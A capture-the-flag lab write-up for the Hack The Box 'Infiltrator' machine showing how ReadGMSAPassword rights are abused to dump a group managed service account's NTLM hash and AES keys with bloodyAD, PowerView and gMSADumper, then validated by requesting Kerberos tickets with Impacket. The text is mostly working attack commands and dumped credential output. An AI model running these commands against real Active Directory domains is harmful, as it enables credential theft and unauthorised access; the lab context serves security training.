ReadGMSAPassword
During domain enumeration with BloodHound, it was identified that the lan_managment account has the ReadGMSAPassword privilege over the infiltrator_svc$ account
Now that the lan_managment account has been compromised, I am able to proceed forward
NTLM
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=lan_managment@dc01.infiltrator.htb.ccache bloodyAD -v DEBUG -d INFILTRATOR.HTB -k --host dc01.infiltrator.htb get object 'CN=INFILTRATOR_SVC,CN=MANAGED SERVICE ACCOUNTS,DC=INFILTRATOR,DC=HTB' --attr msDS-ManagedPassword
distinguishedName: CN=INFILTRATOR_SVC,CN=MANAGED SERVICE ACCOUNTS,DC=INFILTRATOR,DC=HTB
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:52dfec373c144cb8d50334cb73934612
msDS-ManagedPassword.B64ENCODED: K5cA69XOSgFRll7R/u92u7e1RF123aCLHy77k/q2cDLg060pk3Uvu7e4n7D4BhIpJp6i6QwkpnF8wnfWWhUfWO//6RYQ91KpuABDJQRL5jXROtTJ5ZTD1MU9gVZY8csngpKbXL8r4f9K3L9bgljAyAX+Gd1lY3zwoHLtiE57CgbOFuvU8ELqC5yC+PyvxYmUuDiXBcWqKBvGs0b6NRKlMCxIkEj1gOjtVQpbYFqVEfF0KIpoV3qQyb8tQbLVDzx76L8qfiKQBDUsklKdOGkBFtj7oEaz/jJMOHx5ELgmra08AiaZcrD+DJpAxObKhJiGUtG7JQA16SD1kja0JX8VqQ==It can be done through bloodyAD
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=lan_managment@dc01.infiltrator.htb.ccache powerview INFILTRATOR.HTB/@dc01.infiltrator.htb -k --no-pass --dc-ip $IP -ns $IP -q 'Get-DomainObject "CN=INFILTRATOR_SVC,CN=MANAGED SERVICE ACCOUNTS,DC=INFILTRATOR,DC=HTB" -ResolveGUIDs -Properties msDS-ManagedPassword'
Logging directory is set to /home/kali/.powerview/logs/dc01.infiltrator.htb
msDS-ManagedPassword : 52dfec373c144cb8d50334cb73934612or PowerView
Validation (NTLM)
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT 'INFILTRATOR.HTB/infiltrator_svc$@dc01.infiltrator.htb' -dc-ip $IP -hashes :52dfec373c144cb8d50334cb73934612
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in infiltrator_svc$@dc01.infiltrator.htb.ccacheSuccessfully validated
TGT generated for the group managed service account; infiltrator_svc$
Kerberos Secrets
Technically, it’s also possible to retrieve Kerberos secrets (AES128 and AES256), which is preferred for OPSEC 3 well-known tools can be used for the operation;
- DSInternals : A PowerShell module
- GMSAPasswordReader: A C# based executable
- gMSADumper: A Python script
Both DSInternals and GMSAPasswordReader requires a |valid session to the target system as the reading user, whereas gMSADumper can be used remotely
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=lan_managment@dc01.infiltrator.htb.ccache python3 ~/Tools/gMSADumper/gMSADumper.py -d INFILTRATOR.HTB -l $IP -k
Users or groups who can read password for infiltrator_svc$:
> lan_managment
infiltrator_svc$:::52dfec373c144cb8d50334cb73934612
infiltrator_svc$:aes256-cts-hmac-sha1-96:ff9abf4c80c0c6a64b72a566169a2c17d28b37d72534f97b964449d76628e11b
infiltrator_svc$:aes128-cts-hmac-sha1-96:bcc830aa58603a0079878facd347e2afThose are the additional Kerberos secrets in both AES128 and AES256 format
Validation (Kerberos)
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT 'INFILTRATOR.HTB/infiltrator_svc$@dc01.infiltrator.htb' -dc-ip $IP -aesKey ff9abf4c80c0c6a64b72a566169a2c17d28b37d72534f97b964449d76628e11b
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in infiltrator_svc$@dc01.infiltrator.htb.ccacheSuccessfully validated
TGT generated for the group managed service account; infiltrator_svc$